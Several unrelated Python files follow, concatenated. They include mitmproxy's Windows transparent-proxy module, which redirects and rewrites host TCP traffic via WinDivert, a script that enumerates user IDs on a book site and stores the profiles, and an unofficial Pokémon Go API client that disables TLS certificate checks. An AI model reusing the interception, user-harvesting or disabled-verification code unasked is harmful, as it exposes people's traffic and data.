_socket.send_json({ 'Function' : 'RegisterMessageCallback', 'Key' : str(key), "DeclareCallback": bool(declareCallback), 'Description' : str(description), 'Arguments' : inspect.getargspec(func).args , 'ReturnType' : returnType if returnType else '' })
_messageCallbacks.append(_msgCallback)
def SendResponse(context, value):
if not context:
WriteError("Invalid context")
elif not context.IsSaga:
WriteError("No Saga on this context")
else:
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': MessageScope.package.value, 'To' : context.Sender.ConnectionId if context.Sender.Type == 0 else context.Sender.FriendlyName, 'Key': '__Response', 'Value' : value, 'SagaId' : context.SagaId })
def Shutdown():
_socket.send_json({ 'Function' : 'Shutdown' })
def _onReceiveMessage(key, context, data):
try:
for mc in _messageCallbacks:
mc(key, context, data)
except Exception, e:
WriteError("Error while dispatching message '%s': %s" % (key, str(e)))
pass
def _onStateObjectUpdated(stateObject):
try:
for callback in _stateObjectCallbacks:
callback(stateObject)
except Exception, e:
WriteError("Error while dispatching stateObject : %s" % str(e))
pass
def _exit():
global IsRunning
IsRunning = False
if OnExitCallback:
try:
OnExitCallback()
except:
pass
sys.exit()
def _dispatcherMessage():
global Settings
global HasControlManager
global IsConnected
global IsStandAlone
global SentinelName
global PackageName
global PackageInstanceName
global PackageVersion
global PackageAssemblyVersion
global ConstellationClientVersion
global LastStateObjects
while IsRunning:
try:
socks = dict(_poller.poll(1000))
if socks:
message = _socket.recv_json()
if message['Type'] == "PACKAGESTATE":
HasControlManager = message['HasControlManager']
IsConnected = message['IsConnected']
IsStandAlone = message['IsStandAlone']
SentinelName = message['SentinelName']
PackageName = message['PackageName']
PackageInstanceName = message['PackageInstanceName']
PackageVersion = message['PackageVersion']
PackageAssemblyVersion = message['PackageAssemblyVersion']
ConstellationClientVersion = message['ConstellationClientVersion']
elif message['Type'] == "LASTSTATEOBJECTS":
LastStateObjects = []
for so in message['StateObjects']:
LastStateObjects.append(ConvertJsonToObject(so, 'StateObject'))
if OnLastStateObjectsReceived:
try:
OnLastStateObjectsReceived()
except:
pass
elif message['Type'] == "CONNECTIONSTATE":
IsConnected = message['IsConnected']
if OnConnectionChanged:
try:
OnConnectionChanged()
except:
pass
elif message['Type'] == "MSG":
def _addSendResponse(tuple):
tuple.SendResponse = lambda ctx, rsp: SendResponse(ctx, rsp)
context = ConvertJsonToObject(message['Context'], 'MessageContext', _addSendResponse)
if 'Data' in message:
try:
data = ConvertJsonToObject(message['Data'])
except:
data = message['Data']
_onReceiveMessage(message['Key'], context, data)
else:
_onReceiveMessage(message['Key'], context, "")
elif message['Type'] == "SETTINGS":
Settings = message['Settings']
elif message['Type'] == "STATEOBJECT":
try:
so = ConvertJsonToObject(message['StateObject'], 'StateObject')
except:
WriteError("Unable to deserialize the StateObject")
_onStateObjectUpdated(so)
elif message['Type'] == "EXIT":
_exit()
except:
pass
def Start(onStart = None):
StartAsync()
if onStart:
msgCb = len(_messageCallbacks)
try:
onStart()
except Exception, e:
WriteError("Fatal error: %s" % str(e))
_exit()
if len(_messageCallbacks) > msgCb:
DeclarePackageDescriptor()
while IsRunning:
time.sleep(0.1)
def StartAsync():
global IsRunning
RegisterStateObjectLinks()
RegisterMessageCallbacks()
if len(_messageCallbacks) > 0:
DeclarePackageDescriptor()
t1 = Thread(target = _dispatcherMessage)
t1.setDaemon(True)
IsRunning = True
t1.start()
RefreshSettings()
while Settings is None:
time.sleep(1.0)
|
leveldb.py
|
# Tencent is pleased to support the open source community by making GNES available.
#
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
from threading import Thread, Event
from typing import List, Any
from ..base import BaseTextIndexer
from ...proto import gnes_pb2
class LVDBIndexer(BaseTextIndexer):
def __init__(self, data_path: str,
keep_na_doc: bool = True,
drop_raw_bytes: bool = False,
drop_chunk_blob: bool = False,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.data_path = data_path
self.keep_na_doc = keep_na_doc
self.drop_raw_bytes = drop_raw_bytes
self.drop_chunk_blob = drop_chunk_blob
self._NOT_FOUND = None
def post_init(self):
import plyvel
self._db = plyvel.DB(self.data_path, create_if_missing=True)
def add(self, keys: List[int], docs: List['gnes_pb2.Document'], *args, **kwargs):
with self._db.write_batch() as wb:
for k, d in zip(keys, docs):
doc_id = pickle.dumps(k)
if self.drop_raw_bytes:
d.raw_bytes = b''
if self.drop_chunk_blob:
for i in range(len(d.chunks)):
d.chunks[i].ClearField('blob')
doc = d.SerializeToString()
wb.put(doc_id, doc)
def query(self, keys: List[int], *args, **kwargs) -> List['gnes_pb2.Document']:
res = []
for k in keys:
doc_id = pickle.dumps(k)
v = self._db.get(doc_id)
doc = gnes_pb2.Document()
if v is not None:
doc.ParseFromString(v)
res.append(doc)
elif self.keep_na_doc:
res.append(self._NOT_FOUND)
return res
def close(self):
super().close()
self._db.close()
class AsyncLVDBIndexer(LVDBIndexer):
def post_init(self):
super().post_init()
self._is_listening = Event()
self._is_listening.set()
self._is_idle = Event()
self._is_idle.set()
self._jobs = []
self._thread = Thread(target=self._db_write)
self._thread.setDaemon(1)
self._thread.start()
def add(self, keys: List[int], docs: List['gnes_pb2.Document'], *args, **kwargs):
self._jobs.append((keys, docs))
def query(self, *args, **kwargs) -> List[Any]:
self._is_idle.wait()
return super().query(*args, **kwargs)
def _db_write(self):
while self._is_listening.is_set():
while self._jobs:
self._is_idle.clear()
keys, docs = self._jobs.pop()
super().add(keys, docs)
self._is_idle.set()
def close(self):
self._jobs.clear()
self._is_listening.clear()
self._is_idle.wait()
self._thread.join()
super().close()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test elcashd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
ort_eps_test.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import unittest
import torch
import onnxruntime_pybind11_state as torch_ort
import os
import sys
def is_windows():
return sys.platform.startswith("win")
from io import StringIO
import sys
import threading
import time
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
# wait until the thread finishes so we are sure that
# we have until the last character:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out,1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
class OrtEPTests(unittest.TestCase):
def get_test_execution_provider_path(self):
if is_windows():
return os.path.join('.', 'test_execution_provider.dll')
else:
return os.path.join('.', 'libtest_execution_provider.so')
def test_import_custom_eps(self):
torch_ort.set_device(0, 'CPUExecutionProvider', {})
torch_ort._register_provider_lib('TestExecutionProvider', self.get_test_execution_provider_path(), {})
# capture std out
with OutputGrabber() as out:
torch_ort.set_device(1, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' in out.capturedtext
with OutputGrabber() as out:
torch_ort.set_device(2, 'TestExecutionProvider', {'device_id':'1', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 1, some_option: val' in out.capturedtext
# test the reusing EP instance
with OutputGrabber() as out:
torch_ort.set_device(3, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' not in out.capturedtext
# test clear training ep instance pool
torch_ort.clear_training_ep_instances()
with OutputGrabber() as out:
torch_ort.set_device(3, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' in out.capturedtext
#disable the print test for now as we need to merge a PR to pytorch first.
#def test_print(self):
# x = torch.ones(1, 2)
# ort_x = x.to('ort')
# with OutputGrabber() as out:
# print(ort_x)
# assert "tensor([[1., 1.]], device='ort:0')" in out.capturedtext
if __name__ == '__main__':
unittest.main()
|
windows.py
|
import contextlib
import ctypes
import ctypes.wintypes
import io
import json
import os
import re
import socket
import socketserver
import threading
import time
import typing
import click
import collections
import collections.abc
import pydivert
import pydivert.consts
if typing.TYPE_CHECKING:
class WindowsError(OSError):
@property
def winerror(self) -> int:
return 42
REDIRECT_API_HOST = "127.0.0.1"
REDIRECT_API_PORT = 8085
##########################
# Resolver
def read(rfile: io.BufferedReader) -> typing.Any:
x = rfile.readline().strip()
if not x:
return None
return json.loads(x)
def write(data, wfile: io.BufferedWriter) -> None:
wfile.write(json.dumps(data).encode() + b"\n")
wfile.flush()
class Resolver:
sock: socket.socket
lock: threading.RLock
def __init__(self):
self.sock = None
self.lock = threading.RLock()
def setup(self):
with self.lock:
TransparentProxy.setup()
self._connect()
def _connect(self):
if self.sock:
self.sock.close()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((REDIRECT_API_HOST, REDIRECT_API_PORT))
self.wfile = self.sock.makefile('wb')
self.rfile = self.sock.makefile('rb')
write(os.getpid(), self.wfile)
def original_addr(self, csock: socket.socket):
ip, port = csock.getpeername()[:2]
ip = re.sub(r"^::ffff:(?=\d+.\d+.\d+.\d+$)", "", ip)
ip = ip.split("%", 1)[0]
with self.lock:
try:
write((ip, port), self.wfile)
addr = read(self.rfile)
if addr is None:
raise RuntimeError("Cannot resolve original destination.")
return tuple(addr)
except (EOFError, OSError, AttributeError):
self._connect()
return self.original_addr(csock)
class APIRequestHandler(socketserver.StreamRequestHandler):
"""
TransparentProxy API: Returns the pickled server address, port tuple
for each received pickled client address, port tuple.
"""
def handle(self):
proxifier: TransparentProxy = self.server.proxifier
try:
pid: int = read(self.rfile)
if pid is None:
return
with proxifier.exempt(pid):
while True:
c = read(self.rfile)
if c is None:
return
try:
server = proxifier.client_server_map[tuple(c)]
except KeyError:
server = None
write(server, self.wfile)
except (EOFError, OSError):
pass
class APIServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, proxifier, *args, **kwargs):
super().__init__(*args, **kwargs)
self.proxifier = proxifier
self.daemon_threads = True
##########################
# Windows API
# from Windows' error.h
ERROR_INSUFFICIENT_BUFFER = 0x7A
IN6_ADDR = ctypes.c_ubyte * 16
IN4_ADDR = ctypes.c_ubyte * 4
#
# IPv6
#
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366896(v=vs.85).aspx
class MIB_TCP6ROW_OWNER_PID(ctypes.Structure):
_fields_ = [
('ucLocalAddr', IN6_ADDR),
('dwLocalScopeId', ctypes.wintypes.DWORD),
('dwLocalPort', ctypes.wintypes.DWORD),
('ucRemoteAddr', IN6_ADDR),
('dwRemoteScopeId', ctypes.wintypes.DWORD),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwState', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366905(v=vs.85).aspx
def MIB_TCP6TABLE_OWNER_PID(size):
class _MIB_TCP6TABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCP6ROW_OWNER_PID * size)
]
return _MIB_TCP6TABLE_OWNER_PID()
#
# IPv4
#
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366913(v=vs.85).aspx
class MIB_TCPROW_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwState', ctypes.wintypes.DWORD),
('ucLocalAddr', IN4_ADDR),
('dwLocalPort', ctypes.wintypes.DWORD),
('ucRemoteAddr', IN4_ADDR),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366921(v=vs.85).aspx
def MIB_TCPTABLE_OWNER_PID(size):
class _MIB_TCPTABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCPROW_OWNER_PID * size)
]
return _MIB_TCPTABLE_OWNER_PID()
TCP_TABLE_OWNER_PID_CONNECTIONS = 4
class TcpConnectionTable(collections.abc.Mapping):
DEFAULT_TABLE_SIZE = 4096
def __init__(self):
self._tcp = MIB_TCPTABLE_OWNER_PID(self.DEFAULT_TABLE_SIZE)
self._tcp_size = ctypes.wintypes.DWORD(self.DEFAULT_TABLE_SIZE)
self._tcp6 = MIB_TCP6TABLE_OWNER_PID(self.DEFAULT_TABLE_SIZE)
self._tcp6_size = ctypes.wintypes.DWORD(self.DEFAULT_TABLE_SIZE)
self._map = {}
def __getitem__(self, item):
return self._map[item]
def __iter__(self):
return self._map.__iter__()
def __len__(self):
return self._map.__len__()
def refresh(self):
self._map = {}
self._refresh_ipv4()
self._refresh_ipv6()
def _refresh_ipv4(self):
ret = ctypes.windll.iphlpapi.GetExtendedTcpTable(
ctypes.byref(self._tcp),
ctypes.byref(self._tcp_size),
False,
socket.AF_INET,
TCP_TABLE_OWNER_PID_CONNECTIONS,
0
)
if ret == 0:
for row in self._tcp.table[:self._tcp.dwNumEntries]:
local_ip = socket.inet_ntop(socket.AF_INET, bytes(row.ucLocalAddr))
local_port = socket.htons(row.dwLocalPort)
self._map[(local_ip, local_port)] = row.dwOwningPid
elif ret == ERROR_INSUFFICIENT_BUFFER:
self._tcp = MIB_TCPTABLE_OWNER_PID(self._tcp_size.value)
# no need to update size, that's already done.
self._refresh_ipv4()
else:
raise RuntimeError("[IPv4] Unknown GetExtendedTcpTable return code: %s" % ret)
def _refresh_ipv6(self):
ret = ctypes.windll.iphlpapi.GetExtendedTcpTable(
ctypes.byref(self._tcp6),
ctypes.byref(self._tcp6_size),
False,
socket.AF_INET6,
TCP_TABLE_OWNER_PID_CONNECTIONS,
0
)
if ret == 0:
for row in self._tcp6.table[:self._tcp6.dwNumEntries]:
local_ip = socket.inet_ntop(socket.AF_INET6, bytes(row.ucLocalAddr))
local_port = socket.htons(row.dwLocalPort)
self._map[(local_ip, local_port)] = row.dwOwningPid
elif ret == ERROR_INSUFFICIENT_BUFFER:
self._tcp6 = MIB_TCP6TABLE_OWNER_PID(self._tcp6_size.value)
# no need to update size, that's already done.
self._refresh_ipv6()
else:
raise RuntimeError("[IPv6] Unknown GetExtendedTcpTable return code: %s" % ret)
def get_local_ip() -> typing.Optional[str]:
# Auto-Detect local IP. This is required as re-injecting to 127.0.0.1 does not work.
# https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except OSError:
return None
finally:
s.close()
def get_local_ip6(reachable: str) -> typing.Optional[str]:
# The same goes for IPv6, with the added difficulty that .connect() fails if
# the target network is not reachable.
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
try:
s.connect((reachable, 80))
return s.getsockname()[0]
except OSError:
return None
finally:
s.close()
class Redirect(threading.Thread):
daemon = True
windivert: pydivert.WinDivert
def __init__(
self,
handle: typing.Callable[[pydivert.Packet], None],
filter: str,
layer: pydivert.Layer = pydivert.Layer.NETWORK,
flags: pydivert.Flag = 0
) -> None:
self.handle = handle
self.windivert = pydivert.WinDivert(filter, layer, flags=flags)
super().__init__()
def start(self):
self.windivert.open()
super().start()
def run(self):
while True:
try:
packet = self.windivert.recv()
except WindowsError as e:
if e.winerror == 995:
return
else:
raise
else:
self.handle(packet)
def shutdown(self):
self.windivert.close()
def recv(self) -> typing.Optional[pydivert.Packet]:
"""
Convenience function that receives a packet from the passed handler and handles error codes.
If the process has been shut down, None is returned.
"""
try:
return self.windivert.recv()
except WindowsError as e:
if e.winerror == 995:
return None
else:
raise
class RedirectLocal(Redirect):
trusted_pids: typing.Set[int]
def __init__(
self,
redirect_request: typing.Callable[[pydivert.Packet], None],
filter: str
) -> None:
self.tcp_connections = TcpConnectionTable()
self.trusted_pids = set()
self.redirect_request = redirect_request
super().__init__(self.handle, filter)
def handle(self, packet):
client = (packet.src_addr, packet.src_port)
if client not in self.tcp_connections:
self.tcp_connections.refresh()
# If this fails, we most likely have a connection from an external client.
# In this, case we always want to proxy the request.
pid = self.tcp_connections.get(client, None)
if pid not in self.trusted_pids:
self.redirect_request(packet)
else:
# It's not really clear why we need to recalculate the checksum here,
# but this was identified as necessary in https://github.com/mitmproxy/mitmproxy/pull/3174.
self.windivert.send(packet, recalculate_checksum=True)
TConnection = typing.Tuple[str, int]
class ClientServerMap:
"""A thread-safe LRU dict."""
connection_cache_size: typing.ClassVar[int] = 65536
def __init__(self):
self._lock = threading.Lock()
self._map = collections.OrderedDict()
def __getitem__(self, item: TConnection) -> TConnection:
with self._lock:
return self._map[item]
def __setitem__(self, key: TConnection, value: TConnection) -> None:
with self._lock:
self._map[key] = value
self._map.move_to_end(key)
while len(self._map) > self.connection_cache_size:
self._map.popitem(False)
class TransparentProxy:
"""
Transparent Windows Proxy for mitmproxy based on WinDivert/PyDivert. This module can be used to
redirect both traffic that is forwarded by the host and traffic originating from the host itself.
Requires elevated (admin) privileges. Can be started separately by manually running the file.
How it works:
(1) First, we intercept all packages that match our filter.
We both consider traffic that is forwarded by the OS (WinDivert's NETWORK_FORWARD layer) as well
as traffic sent from the local machine (WinDivert's NETWORK layer). In the case of traffic from
the local machine, we need to exempt packets sent from the proxy to not create a redirect loop.
To accomplish this, we use Windows' GetExtendedTcpTable syscall and determine the source
application's PID.
For each intercepted package, we
1. Store the source -> destination mapping (address and port)
2. Remove the package from the network (by not reinjecting it).
3. Re-inject the package into the local network stack, but with the destination address
changed to the proxy.
(2) Next, the proxy receives the forwarded packet, but does not know the real destination yet
(which we overwrote with the proxy's address). On Linux, we would now call
getsockopt(SO_ORIGINAL_DST). We now access the redirect module's API (see APIRequestHandler),
submit the source information and get the actual destination back (which we stored in 1.1).
(3) The proxy now establishes the upstream connection as usual.
(4) Finally, the proxy sends the response back to the client. To make it work, we need to change
the packet's source address back to the original destination (using the mapping from 1.1),
to which the client believes it is talking to.
Limitations:
- We assume that ephemeral TCP ports are not re-used for multiple connections at the same time.
The proxy will fail if an application connects to example.com and example.org from
192.168.0.42:4242 simultaneously. This could be mitigated by introducing unique "meta-addresses"
which mitmproxy sees, but this would remove the correct client info from mitmproxy.
"""
local: typing.Optional[RedirectLocal] = None
# really weird linting error here.
forward: typing.Optional[Redirect] = None # noqa
response: Redirect
icmp: Redirect
proxy_port: int
filter: str
client_server_map: ClientServerMap
def __init__(
self,
local: bool = True,
forward: bool = True,
proxy_port: int = 8080,
filter: typing.Optional[str] = "tcp.DstPort == 80 or tcp.DstPort == 443",
) -> None:
self.proxy_port = proxy_port
self.filter = (
filter
or
f"tcp.DstPort != {proxy_port} and tcp.DstPort != {REDIRECT_API_PORT} and tcp.DstPort < 49152"
)
self.ipv4_address = get_local_ip()
self.ipv6_address = get_local_ip6("2001:4860:4860::8888")
# print(f"IPv4: {self.ipv4_address}, IPv6: {self.ipv6_address}")
self.client_server_map = ClientServerMap()
self.api = APIServer(self, (REDIRECT_API_HOST, REDIRECT_API_PORT), APIRequestHandler)
self.api_thread = threading.Thread(target=self.api.serve_forever)
self.api_thread.daemon = True
if forward:
self.forward = Redirect(
self.redirect_request,
self.filter,
pydivert.Layer.NETWORK_FORWARD
)
if local:
self.local = RedirectLocal(
self.redirect_request,
self.filter
)
# The proxy server responds to the client. To the client,
# this response should look like it has been sent by the real target
self.response = Redirect(
self.redirect_response,
f"outbound and tcp.SrcPort == {proxy_port}",
)
# Block all ICMP requests (which are sent on Windows by default).
# If we don't do this, our proxy machine may send an ICMP redirect to the client,
# which instructs the client to directly connect to the real gateway
# if they are on the same network.
self.icmp = Redirect(
lambda _: None,
"icmp",
flags=pydivert.Flag.DROP
)
@classmethod
def setup(cls):
# TODO: Make sure that server can be killed cleanly. That's a bit difficult as we don't have access to
# controller.should_exit when this is called.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_unavailable = s.connect_ex((REDIRECT_API_HOST, REDIRECT_API_PORT))
if server_unavailable:
proxifier = TransparentProxy()
proxifier.start()
def start(self):
self.api_thread.start()
self.icmp.start()
self.response.start()
if self.forward:
self.forward.start()
if self.local:
self.local.start()
def shutdown(self):
if self.local:
self.local.shutdown()
if self.forward:
self.forward.shutdown()
self.response.shutdown()
self.icmp.shutdown()
self.api.shutdown()
def redirect_request(self, packet: pydivert.Packet):
# print(" * Redirect client -> server to proxy")
# print(f"{packet.src_addr}:{packet.src_port} -> {packet.dst_addr}:{packet.dst_port}")
client = (packet.src_addr, packet.src_port)
self.client_server_map[client] = (packet.dst_addr, packet.dst_port)
# We do need to inject to an external IP here, 127.0.0.1 does not work.
if packet.address_family == socket.AF_INET:
assert self.ipv4_address
packet.dst_addr = self.ipv4_address
elif packet.address_family == socket.AF_INET6:
if not self.ipv6_address:
self.ipv6_address = get_local_ip6(packet.src_addr)
assert self.ipv6_address
packet.dst_addr = self.ipv6_address
else:
raise RuntimeError("Unknown address family")
packet.dst_port = self.proxy_port
packet.direction = pydivert.consts.Direction.INBOUND
# We need a handle on the NETWORK layer. the local handle is not guaranteed to exist,
# so we use the response handle.
self.response.windivert.send(packet)
def redirect_response(self, packet: pydivert.Packet):
"""
If the proxy responds to the client, let the client believe the target server sent the
packets.
"""
# print(" * Adjust proxy -> client")
client = (packet.dst_addr, packet.dst_port)
try:
packet.src_addr, packet.src_port = self.client_server_map[client]
except KeyError:
print(f"Warning: Previously unseen connection from proxy to {client}")
else:
packet.recalculate_checksums()
self.response.windivert.send(packet, recalculate_checksum=False)
@contextlib.contextmanager
def exempt(self, pid: int):
if self.local:
self.local.trusted_pids.add(pid)
try:
yield
finally:
if self.local:
self.local.trusted_pids.remove(pid)
@click.group()
def cli():
pass
@cli.command()
@click.option("--local/--no-local", default=True,
help="Redirect the host's own traffic.")
@click.option("--forward/--no-forward", default=True,
help="Redirect traffic that's forwarded by the host.")
@click.option("--filter", type=str, metavar="WINDIVERT_FILTER",
help="Custom WinDivert interception rule.")
@click.option("-p", "--proxy-port", type=int, metavar="8080", default=8080,
help="The port mitmproxy is listening on.")
def redirect(**options):
"""Redirect flows to mitmproxy."""
proxy = TransparentProxy(**options)
proxy.start()
print(f" * Redirection active.")
print(f" Filter: {proxy.filter}")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print(" * Shutting down...")
proxy.shutdown()
print(" * Shut down.")
@cli.command()
def connections():
"""List all TCP connections and the associated PIDs."""
connections = TcpConnectionTable()
connections.refresh()
for (ip, port), pid in connections.items():
print(f"{ip}:{port} -> {pid}")
if __name__ == "__main__":
cli()
|
run.py
|
from wenku8 import Wenku8
import threading
import pymongo
import time
# 整体配置
max_thread = 9 + 1
max_bid = 2596
max_uid = 530655
max_rid = 191767
# MongoDB数据库
client = pymongo.MongoClient()
db = client.wenku8
# Wenku8 的爬虫对象
wk = Wenku8()
wk.login()
def db_book_info(result: dict):
print(result)
db.book.insert_one(result)
def db_review_info(result: dict):
print(result)
db.review.insert_one(result)
def db_user_info(result: dict):
print(result)
db.user.insert_one(result)
def get_books_info():
top = 1
while top <= max_bid:
# 先开满进程,发现缺了就补
while len(threading.enumerate()) < max_thread and top <= max_bid:
t = threading.Thread(target=wk.fetch_book_info, args=(top, db_book_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def get_review_info():
top = 180206
while top <= max_rid:
# 先开满进程,发现缺了就补
while len(threading.enumerate()) < max_thread * 2 and top <= max_rid:
t = threading.Thread(target=wk.fetch_reviews, args=(top, 0, None, db_review_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def get_user_info():
top = 331277
while top <= max_uid:
# 先开满进程,发现缺了就补
while len(threading.enumerate()) < max_thread * 2 and top <= max_uid:
t = threading.Thread(target=wk.fetch_user_info, args=(top, db_user_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def main():
# get_books_info()
# get_review_info()
get_user_info()
if __name__ == '__main__':
main()
|
examplev3.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print( '[-] {}'.format(message))
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError) as e:
debug(
